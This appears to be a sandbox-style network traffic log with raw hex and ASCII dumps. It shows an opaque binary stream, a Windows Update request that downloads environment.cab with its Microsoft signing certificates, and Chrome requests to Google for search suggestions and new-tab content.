2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 33 4a c5 30 31 35 0d fa ce c8 ce 17 17 31 31 37 31 09 f7 ce ce c8 4f 2c 3f 31 35 1f 2e 29 37 37 11 36 31 31 37 4f f6 30 31 35 4c 23 39 37 35 0b 95 ce ce c8 17 11 36 31 31 37 09 a6 c8 ce ce 25 31 31 20 1b 31 37 31 23 37 31 25 1d 31 31 37 32 01 3f 31 35 37 31 31 37 31 31 37 31 31 37 1b 30 2b 31 31 37 31 48 36 74 8f 36 08 2f 37 31 30 37 31 79 37 74 bc 37 08 2f 37 31 30 34 01 39 37 35 31 37 31 31 37 31 31 37 31 26 1d 70 05 37 31 33 37 31 31 98 31 31 37 ff 30 37 31 4c 35 31 31 5e 31 31 37 31 31 37 31 31 37 31 31 6f 31 31 37 82 33 37 31 3a 34 31 31 0d 31 31 37 1e 31 37 30 22 07 36 31 33 31 31 37 31 31 37 31 31 37 26 1b 24 01 36 37 35 31 37 31 31 37 31 31 37 31 26 1d 22 01 30 31 39 37 31 31 37 31 31 37 31 25 92 0b 31 37 30 1b 24 01 32 37 35 31 37 31 31 37 31 31 Data Ascii: 3J0151171O,?15.)776117O015L#9756117%11 171#71%1172?1571171171170+1171H6t6/71071y7t7/7104975171171171&p713711117071L511^11711711711o117371:411117170"613117117117&$675171171171&"01971171171%170$2751711711
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 31 37 31 31 37 25 1b 24 01 34 37 e6 31 37 31 30 37 31 20 1f dd 22 37 37 11 34 31 31 37 cf 3f 37 31 09 37 31 31 37 cf 3d 37 31 74 32 31 31 37 28 31 37 31 4c 37 31 31 32 31 31 37 65 31 37 31 4f 37 31 31 0f 25 31 37 31 4f 29 39 31 33 19 12 2f 31 37 17 35 31 37 31 09 f9 ce ce c8 2e 3a ba 01 31 37 30 14 e7 1b 30 37 35 4f e1 39 31 33 19 32 2c 31 37 b7 47 31 37 35 11 37 31 31 37 4f f6 30 31 35 4c 26 39 37 35 08 a9 ce ce c8 17 11 36 31 31 37 09 a2 c8 ce ce 49 2c 39 37 35 19 28 29 31 31 11 33 37 31 31 49 f6 36 37 35 4a cf 36 31 33 08 44 c8 ce ce 11 11 31 37 31 31 0f 5b ce c8 ce 1b 49 2d 39 37 35 19 2c 29 31 31 11 31 37 31 31 49 f6 36 37 35 4a f7 36 31 33 08 7a c8 ce ce 11 11 31 37 31 31 0f 71 ce c8 ce 31 25 31 31 20 1b 31 37 31 23 37 31 25 1d 31 31 37 5b 19 db 22 Data Ascii: 17117%$47171071 "774117?717117=71t2117(171L7112117e171O711%171O)913/175171.:170075O9132,17G1757117O015L&9756117I,975()113711I675J613D1711[I-975,)111711I675J613z1711q1%11 171#71%117["
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 11 33 37 31 31 49 f6 36 37 35 4a e8 36 31 33 08 93 c8 ce ce 11 11 33 37 31 31 0f a6 ce c8 ce 23 37 31 26 1d 31 31 37 23 31 37 25 1b 37 31 31 24 01 32 37 b1 31 37 31 30 37 31 20 1f dd 22 37 37 11 35 31 31 37 cf 3f 37 31 09 37 31 31 37 cf 3d 37 31 74 34 31 31 37 66 31 37 31 34 37 31 31 19 31 31 37 09 63 37 31 31 49 2f 39 37 35 19 14 29 31 31 11 31 37 31 31 49 f6 36 37 35 4a 82 36 31 33 0b fd c8 ce ce 11 11 31 37 31 31 0f f0 ce c8 ce 4f 2a 39 31 33 19 2e 2f 31 37 17 30 31 37 31 4f f0 36 31 33 4a dc 30 31 35 0e 92 ce c8 ce 17 17 30 31 37 31 09 af ce ce c8 1b 23 37 31 26 1d 31 31 37 23 31 37 25 1b 37 31 31 34 01 39 37 35 31 37 31 31 37 31 31 37 31 31 1d 70 2d 37 31 31 37 31 31 07 31 31 37 0f 32 37 31 5f 34 31 31 0e 31 31 37 2f 31 37 30 22 07 32 31 33 31 31 37 Data Ascii: 3711I675J6133711#71&117#17%711$27171071 "775117?717117=71t4117f1714711117c711I/975)111711I675J6131711O*913./170171O613J0150171#71&117#17%71149751711711711p-711711117271_411117/170"213117
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 37 35 19 28 29 31 31 11 31 37 31 31 49 f6 36 37 35 4a e6 36 31 33 0b 92 c8 ce ce 11 11 31 37 31 31 0f a9 ce c8 ce 1b 25 31 31 20 1b 31 37 31 23 37 31 25 1d 31 31 37 23 31 37 26 1b 37 31 31 25 31 31 37 1b 31 37 31 32 07 39 31 33 31 31 37 31 31 37 31 31 37 31 1b 76 2d 31 37 31 31 37 31 60 37 31 31 e7 30 31 37 10 33 37 31 08 37 31 31 29 31 31 36 32 01 3f 31 35 37 31 31 37 31 31 37 31 31 37 1b 70 2b 31 31 37 31 31 37 61 31 37 31 e0 36 31 31 16 33 31 37 08 31 37 31 2f 37 31 30 24 01 32 37 b1 31 37 31 30 37 31 20 1f dd 22 37 37 11 35 31 31 37 cf 3f 37 31 09 37 31 31 37 cf 3d 37 31 74 34 31 31 37 34 31 37 31 37 37 31 31 18 31 31 37 09 31 37 31 31 1d 4f 2f 3f 31 35 1f 12 29 37 37 11 37 31 31 37 4f f6 30 31 35 4c e5 36 37 35 0b fc ce ce c8 17 11 37 31 31 37 09 f1 Data Ascii: 75()111711I675J6131711%11 171#71%117#17&711%11717129131171171171v-171171`711017371711)1162?157117117117p+117117a171611317171/710$27171071 "775117?717117=71t4117417177111171711O/?15)777117O015L6757117

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49689	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:46 UTC	309	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tlSuF3oHAXZy8GK&MD=YHsdUPEh HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-06-19 10:58:46 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Thu, 19 Jun 2025 10:58:46 GMT cache-control: no-cache etag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 24490 slsversion: 2.0 ms-correlationid: 8108571e-60e1-4bd0-808d-c746bb8456e2 ms-requestid: e66788f1-8722-43c1-8029-2548493c4fe8 ms-cv: ZTJzIdR4SECEVV8i.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 2880 content-disposition: attachment; filename=environment.cab
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: c7 c3 8f 06 b6 24 05 3c f9 2c cb e0 99 86 1a f8 03 ca b3 04 d8 16 f0 f9 32 7f 28 14 e1 08 d8 03 b6 5f ca 00 2c ca e8 4f 1f 06 4e 31 f0 2f 3c 0e 0b 50 12 26 c4 00 85 7e 42 c0 00 c8 0f fa 0d c7 c3 a0 90 23 e5 21 63 33 1e a7 e6 2a f9 c3 ee 4b 69 ce 94 9b 68 c7 7b df ba c7 eb c3 55 b3 50 05 c8 b4 a7 ea a2 5e 5e cd 3a a2 aa 75 43 4b 97 f4 bd 25 ec 55 81 8f 48 6a d4 2b fb 61 52 86 d0 3b 01 14 b0 69 f4 31 7a b6 35 59 f1 51 9b 07 06 22 e9 3b 54 1f 1c 09 53 6c 08 99 9d 74 59 32 ad 33 42 5a f5 2c 05 bf b7 e9 cf 8f 5d 2c 89 c9 8a 5f 6c 65 4c 0c 6d 6a 3f 83 6c b8 bf a3 10 39 92 ad fd bc d8 94 f7 ca 6b ef 90 4b eb 87 76 34 1d 50 f6 0b 7d 4a 62 19 4b 92 ae d4 3f 79 3c 37 e1 2d 6c bc f7 fc 95 94 bd 9c f5 56 86 da 39 b9 b3 67 4c 1a 17 d4 27 59 97 fa bb 03 e7 1b 32 9c 5f Data Ascii: $<,2(_,ON1/<P&~B#!c3*Kih{UP^^:uCK%UHj+aR;i1z5YQ";TSltY23BZ,],_leLmj?l9kKv4P}JbK?y<7-lV9gL'Y2_
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 99 5f f0 57 d3 49 7b b2 e4 e5 c0 9e f2 e2 b5 17 92 26 2b c1 a3 c2 60 60 5d 36 2c de 60 61 ea e8 98 df 55 7a a8 91 e4 a9 84 e0 3b 6e 95 89 91 fc a7 0f 95 af 35 36 d1 a7 99 9e 88 5e 1c 90 6f 76 55 35 c9 a6 7b 9c 57 31 1c 7d 98 8c a5 d0 5c 66 01 23 08 79 a0 ac fd 28 e3 66 c4 5d bc 06 ed c2 ac 2e 85 85 1d 2c f9 63 f9 ae 62 0a e0 dc fd 65 e4 07 da 27 83 27 db 54 2f 30 4f ab 57 35 d0 e3 25 bc 3a 8a 0f 18 ab 06 65 1d c3 c6 d7 dc 20 e5 92 42 df 59 3a dd 99 b4 1e 33 04 f5 9c 31 69 0f ec 13 9b b8 7c 93 51 3a 5b 90 33 78 d9 c2 f9 a0 e5 54 1d b7 41 12 7c ea 48 f9 8b 32 9d cb 22 59 19 02 65 dd 61 fc 1e b6 2d 6d 85 1b 49 c9 9e 9d a6 e3 15 82 bd e8 4e 07 0a 96 41 09 6c 7a 91 fe 23 c6 ec 81 c3 34 b3 bc bd 6d 1b a2 f9 9d 9a 55 ad 27 0b b3 da 0d 82 7c 98 8d 2d 3b d6 c6 13 Data Ascii: _WI{&+``]6,`aUz;n56^ovU5{W1}\f#y(f].,cbe''T/0OW5%:e BY:31i\|Q:[3xTA\|H2"Yea-mINAlz#4mU'\|-;
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 2d 5f d0 00 d0 07 f4 72 f6 e6 e8 44 69 fd 25 5f 10 dc 3f 70 f7 40 41 25 f8 69 80 38 20 27 0e a0 36 fd 40 ab 6d 7e e0 7e 60 1f a0 bb cd 0f 54 fd d7 fc c0 df e9 fb c7 c8 07 c3 96 47 48 09 90 7f f5 08 49 7f e5 05 82 72 c3 a4 de 98 91 55 c3 ea 10 ce a3 13 c3 f7 12 97 f6 c4 ce d7 c2 d9 28 f3 83 ce ec 99 14 4b d4 be 03 9e 48 26 e8 06 e4 1c e3 a4 41 09 dd e2 d3 84 db 86 e8 d2 f6 fb 0d f2 bb 63 cb fd 6b 48 cc 83 a9 85 16 0a 62 17 34 a2 dc b2 5c 8e 5a 11 11 25 46 bc 99 aa 15 3b c9 46 0f 5f 5e b9 9a fd a8 03 36 50 d9 0b 10 d7 86 2a ed 8c d3 6e 1f ed e9 f0 96 84 f7 3b dc 1d 9e 09 6e c5 df da 17 74 23 13 af d2 ac 85 dd 4d 74 ea 15 fd 52 cf 64 7f b7 fa f3 19 03 d1 3c 1d f9 9e 49 c6 ae 97 08 66 b1 ba 94 91 c7 2a c7 ee c7 ef 55 45 e4 5e a7 ed 2e 5d 46 59 44 0d 4b 8d 93 Data Ascii: -_rDi%_?p@A%i8 '6@m~~`TGHIrU(KH&AckHb4\Z%F;F_^6Pn;nt#MtRd<IfUE^.]FYDK
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: f4 d2 5b 0d c4 46 f4 08 0d 64 b7 dd 0e 23 c4 4a be c6 2c 08 e4 15 96 43 0e 90 12 6e 83 93 e4 22 73 bf 9c 43 a3 72 7e 18 32 1c 87 83 10 55 1d 3d 13 70 78 a0 df ea 3e bc 8f 9c f3 c9 cd b2 63 9f 56 68 27 2f ce f2 f7 d1 be 1e 37 ef db 07 4d 38 19 d3 72 07 4b 21 bd e4 5a 22 2f df 9c d9 42 cd 28 ce 46 7d 02 5e c0 3a 7d 59 8f ba 2b d9 8a 6a ee ee 00 2f 1d b9 28 fd 40 78 e3 bc e0 27 36 dd fd 43 d9 6a 3e 0d 73 ca 91 ee 0f 3d a6 1a b5 25 8c d1 15 8a d7 f8 93 2e 54 ac df 56 e1 7f ed 19 54 17 27 34 90 14 e3 70 8c 6c 7f ff 7e 4f 51 14 1e 4e 05 72 47 b2 4d 89 4e f9 67 77 f4 77 a9 eb f6 50 12 1e aa 0b b0 6d 8f 25 51 7d 17 52 f8 55 b8 68 f5 90 ab 07 5f 36 1f f1 e4 1e e5 fb f3 73 97 9a e6 1d ab bb ee b9 59 5a f2 3c e8 6d 9f be 51 7b 02 c0 7d d8 d6 01 4c 12 85 7b 05 e0 5e Data Ascii: [Fd#J,Cn"sCr~2U=px>cVh'/7M8rK!Z"/B(F}^:}Y+j/(@x'6Cj>s=%.TVT'4pl~OQNrGMNgwwPm%Q}RUh_6sYZ<mQ{}L{^
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 17 7a 50 e3 3d 37 50 78 c6 9b 00 9e b1 6c 93 1f 64 fc 47 28 e5 6f 7b 2c 3f 66 9c 1b c0 91 91 7f f1 eb 59 11 28 38 61 06 ff bf 92 d0 14 5f 4d 0f e8 d9 e9 00 5a 30 6e 48 2f 23 03 13 4d 57 f0 f8 e5 8d 51 9b 88 0d f9 1d 57 58 98 cf e8 0b 8c f6 eb 9c da ff e4 4a 13 15 29 0c 69 75 94 79 e3 95 50 e5 48 e0 90 99 54 fe c5 90 26 13 97 27 85 89 ed 99 b4 32 69 b3 23 07 e3 9e fb e7 e2 e9 27 ff d9 3c 6e 78 48 c3 3d 4c b0 78 83 47 97 43 99 4b fa 65 6a 2b a5 20 16 23 d3 dd e2 46 1d 6b 79 16 e2 7b e7 3e e7 71 eb 7f c8 e3 4a 49 a0 64 7e e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 ff ab f3 b8 5d a3 0e 92 5e 1d d9 33 07 9d b4 5a 5b 1f 36 94 07 fb 31 44 46 72 24 1d af 77 ba 94 e6 6b df 96 Data Ascii: zP=7PxldG(o{,?fY(8a_MZ0nH/#MWQWXJ)iuyPHT&'2i#'<nxH=LxGCKej+ #Fky{>qJId~qqqqqqqqqqqqqqq]^3Z[61DFr$wk
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 72 61 74 69 6f 6e 73 20 50 75 65 72 74 6f 20 52 69 63 6f 31 16 30 14 06 03 55 04 05 13 0d 32 33 30 38 32 39 2b 34 35 34 32 33 37 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ad 94 76 8f 83 ad 0e 03 a3 e8 3b b0 d7 34 68 d4 79 3a 7d dc 30 60 06 03 55 1d 1f 04 59 30 57 30 55 a0 53 a0 51 86 4f 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 72 6c 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 74 65 25 32 30 53 69 67 6e 69 6e 67 25 32 30 43 41 25 32 30 32 2e 31 2e 63 72 6c 30 6d 06 08 2b 06 01 05 05 07 01 01 04 61 30 5f 30 5d 06 08 2b 06 01 05 05 07 30 02 86 51 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 Data Ascii: rations Puerto Rico10U230829+4542370U#0v;4hy:}0`UY0W0USQOhttp://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl0m+a0_0]+0Qhttp://www.microsoft.com/pkiops/certs/Microsoft%20U
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 6c d5 21 c9 b8 50 68 05 c3 e4 09 c9 bd 51 c9 5f 6d 75 4f 8d 35 30 c5 8c c1 83 b2 1f 93 b5 72 6f d2 44 90 1d ed 7f 13 a9 7d 53 24 9c aa 46 c0 8f c5 c5 be bf c8 55 14 fe 87 35 fe cd d5 7e 02 d2 87 68 00 c9 b8 d7 44 cb 71 db a4 8b b3 e0 0e a6 0b ce 12 7d f6 68 dc c0 91 31 f8 59 2c 2c f5 d5 d1 2e 08 9d 2b 30 6a 6e aa ad 9e 16 4e 27 d0 ba 3b 1a 81 30 43 38 92 87 e1 6c 6f 43 3d 2d 4e 1f 0d 10 c1 f8 fa bc 84 c8 93 c3 9e 47 fc b6 fa d1 2f b6 af 39 3e 9c 3f 1c f1 4d a4 16 d3 0a e2 e7 4e f5 37 88 03 46 8e 1e cc 77 c1 47 d3 44 b7 e4 35 23 db eb 20 cb 2a f5 57 ae 2e 00 3b 6b e6 a3 6e 05 99 70 bb 76 3b d8 3c b4 76 f6 28 15 3a 25 d4 26 a4 08 9f d9 7e 7b 44 8a b7 15 8a c6 c5 78 2a 9d 32 c4 83 7b b9 6e 42 14 99 5d 49 7f 45 99 57 a7 33 77 44 1a ff 47 a3 71 b7 b0 b1 56 8a Data Ascii: l!PhQ_muO50roD}S$FU5~hDq}h1Y,,.+0jnN';0C8loC=-NG/9>?MN7FwGD5# W.;knpv;<v(:%&~{Dx2{nB]IEW3wDGqV
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: 42 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 34 30 32 a0 14 80 12 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 a1 1a 80 18 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 3d cd 0e 0a 7b 43 82 69 14 76 9b c2 1b 25 6c 3f 01 d0 b8 bb 6f e9 4d 62 55 f3 7a 5b c4 05 04 2e 09 48 41 fd e9 13 24 1e f0 71 f0 79 9e 8e a7 ea d7 72 49 9f 71 e8 41 4c 0a 8e 69 71 3c 8f e9 56 c5 9d a0 e6 3c df 48 88 1c cf 7f eb a0 34 f3 ff 37 ca 6d 9f c7 86 eb 12 35 0a 45 a5 81 a8 f8 53 6d c6 11 4e ef 37 77 2a 73 bf 08 f9 ee ba 8d b8 48 1a 93 32 44 3a cd 7c 41 2d e3 20 7e 34 a2 7c 2b 93 92 2f 0a 5f 17 c8 65 98 79 74 bb e7 1c 1a e2 6c a4 15 db cf ae 5b 18 f9 9a 82 ab 98 f5 13 93 f3 0f 89 71 a4 2f c0 7e Data Ascii: B+71402Microsofthttp://www.microsoft.com0H={Civ%l?oMbUz[.HA$qyrIqALiq<V<H47m5ESmN7wsH2D:\|A- ~4\|+/_eytl[q/~
2025-06-19 10:58:46 UTC	1460	IN	Data Raw: a3 82 01 1b 30 82 01 17 30 1d 06 03 55 1d 0e 04 16 04 14 ec 97 76 68 29 fe 13 4f cd 74 c6 25 18 f2 00 7c da 7d d7 a7 30 1f 06 03 55 1d 23 04 18 30 16 80 14 d5 63 3a 5c 8a 31 90 f3 43 7b 7c 46 1b c5 33 68 5a 85 6d 55 30 56 06 03 55 1d 1f 04 4f 30 4d 30 4b a0 49 a0 47 86 45 68 74 74 70 3a 2f 2f 63 72 6c 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 72 6c 2f 70 72 6f 64 75 63 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 6c 30 5a 06 08 2b 06 01 05 05 07 01 01 04 4e 30 4c 30 4a 06 08 2b 06 01 05 05 07 30 02 86 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 65 72 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 74 30 0c 06 Data Ascii: 00Uvh)Ot%\|}0U#0c:\1C{\|F3hZmU0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49700	142.250.80.100	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:55 UTC	492	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 host: www.google.com x-client-data: CMHxygE= sec-fetch-site: none sec-fetch-mode: no-cors sec-fetch-dest: empty user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=4, i
2025-06-19 10:58:55 UTC	1277	IN	HTTP/1.1 200 OK date: Thu, 19 Jun 2025 10:58:55 GMT pragma: no-cache expires: -1 cache-control: no-cache, must-revalidate content-type: text/javascript; charset=UTF-8 strict-transport-security: max-age=31536000 content-security-policy: object-src 'none';base-uri 'self';script-src 'nonce-4GQDACh-uaHMMC-vFCw07Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 cross-origin-opener-policy: same-origin-allow-popups; report-to="gws" report-to: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} accept-ch: Sec-CH-Prefers-Color-Scheme accept-ch: Downlink accept-ch: RTT accept-ch: Sec-CH-UA-Form-Factors accept-ch: Sec-CH-UA-Platform accept-ch: Sec-CH-UA-Platform-Version accept-ch: Sec-CH-UA-Full-Version accept-ch: Sec-CH-UA-Arch accept-ch: Sec-CH-UA-Model accept-ch: Sec-CH-UA-Bitness accept-ch: Sec-CH-UA-Full-Version-List accept-ch: Sec-CH-UA-WoW64 permissions-policy: unload=() content-disposition: attachment; filename="f.txt" server: gws x-xss-protection: 0 x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 accept-ranges: none vary: Accept-Encoding content-length: 875
2025-06-19 10:58:55 UTC	875	IN	Data Raw: 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 6c 61 79 73 74 61 74 69 6f 6e 20 70 6c 75 73 20 6a 75 6c 79 20 66 72 65 65 20 67 61 6d 65 73 22 2c 22 77 65 61 74 68 65 72 20 68 65 61 74 20 77 61 76 65 22 2c 22 6a 6f 68 6e 20 6d 61 72 73 74 6f 6e 20 61 63 74 6f 72 22 2c 22 62 61 6e 6b 73 20 6a 75 6e 65 74 65 65 6e 74 68 20 68 6f 6c 69 64 61 79 22 2c 22 6d 61 78 69 6d 75 6d 20 61 6c 65 72 74 20 73 70 61 63 65 20 73 74 61 74 69 6f 6e 22 2c 22 63 61 70 72 69 20 73 75 6e 20 73 75 6d 6d 65 72 20 73 6f 6c 73 74 69 63 65 20 70 6f 75 63 68 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 62 61 6c 61 6e 63 65 20 70 61 74 63 68 20 6e 6f 74 65 73 22 2c 22 63 6f 6e 73 6f 6c 65 20 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 Data Ascii: )]}'["",["playstation plus july free games","weather heat wave","john marston actor","banks juneteenth holiday","maximum alert space station","capri sun summer solstice pouch","marvel rivals balance patch notes","console nintendo switch"],["","","","",""
2025-06-19 10:58:55 UTC	395	OUT	GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1 host: www.google.com x-client-data: CMHxygE= sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: empty user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=4, i
2025-06-19 10:58:55 UTC	1032	IN	HTTP/1.1 200 OK version: 772435172 content-type: application/json; charset=UTF-8 x-content-type-options: nosniff strict-transport-security: max-age=31536000 cross-origin-opener-policy: same-origin-allow-popups; report-to="gws" report-to: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} accept-ch: Sec-CH-Prefers-Color-Scheme accept-ch: Downlink accept-ch: RTT accept-ch: Sec-CH-UA-Form-Factors accept-ch: Sec-CH-UA-Platform accept-ch: Sec-CH-UA-Platform-Version accept-ch: Sec-CH-UA-Full-Version accept-ch: Sec-CH-UA-Arch accept-ch: Sec-CH-UA-Model accept-ch: Sec-CH-UA-Bitness accept-ch: Sec-CH-UA-Full-Version-List accept-ch: Sec-CH-UA-WoW64 permissions-policy: unload=() content-disposition: attachment; filename="f.txt" date: Thu, 19 Jun 2025 10:58:55 GMT server: gws x-xss-protection: 0 x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 accept-ranges: none vary: Accept-Encoding content-length: 130933
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 33 64 20 67 62 5f 51 65 20 67 62 5f 73 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 Data Ascii: )]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_3d gb_Qe gb_sd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003c
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 35 64 20 67 62 5f 46 63 20 67 62 5f 38 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 50 64 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c Data Ascii: div class\u003d\"gb_Ec\"\u003e\u003ca class\u003d\"gb_5d gb_Fc gb_8d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Pd gb_7d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\
